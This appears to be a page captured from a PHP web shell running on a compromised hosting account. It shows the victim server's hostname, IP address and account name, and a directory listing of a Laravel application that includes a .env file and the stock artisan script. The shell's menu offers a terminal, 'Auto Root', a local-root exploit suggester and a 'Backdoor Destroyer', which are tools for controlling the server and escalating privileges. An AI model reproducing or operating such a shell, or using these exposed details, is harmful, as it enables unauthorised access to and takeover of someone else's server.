Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
public_html /
app /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
assets
[ DIR ]
drwxr-xr-x
2026-06-11 02:58
bootstrap
[ DIR ]
drwxr-xr-x
2026-06-11 02:58
cache
[ DIR ]
drwxr-xr-x
2026-06-11 02:58
config
[ DIR ]
drwxr-xr-x
2026-06-09 20:33
database
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
public
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
resources
[ DIR ]
drwxr-xr-x
2026-06-09 23:28
routes
[ DIR ]
drwxr-xr-x
2026-06-02 05:04
storage
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
tests
[ DIR ]
drwxr-xr-x
2026-06-02 05:04
vendor
[ DIR ]
drwxr-xr-x
2026-06-01 03:28
.editorconfig
258
B
-rw-r--r--
2024-02-13 02:23
.env
1.16
KB
-rw-r--r--
2024-09-01 06:51
.env.example
1.07
KB
-rw-r--r--
2024-02-13 02:23
.gitattributes
186
B
-rw-r--r--
2024-02-13 02:23
.gitignore
243
B
-rw-r--r--
2024-02-13 02:23
.htaccess
237
B
-r-xr-xr-x
2026-06-11 02:58
README.md
4.01
KB
-rw-r--r--
2024-02-13 02:23
artisan
1.65
KB
-rw-r--r--
2024-02-13 02:23
composer.json
1.98
KB
-rw-r--r--
2024-09-01 07:15
composer.lock
303.2
KB
-rw-r--r--
2024-09-01 07:15
package.json
248
B
-rw-r--r--
2024-02-13 02:23
phpunit.xml
1.11
KB
-rw-r--r--
2024-02-13 02:23
vite.config.js
263
B
-rw-r--r--
2024-02-13 02:23
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any of our classes manually. It's great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);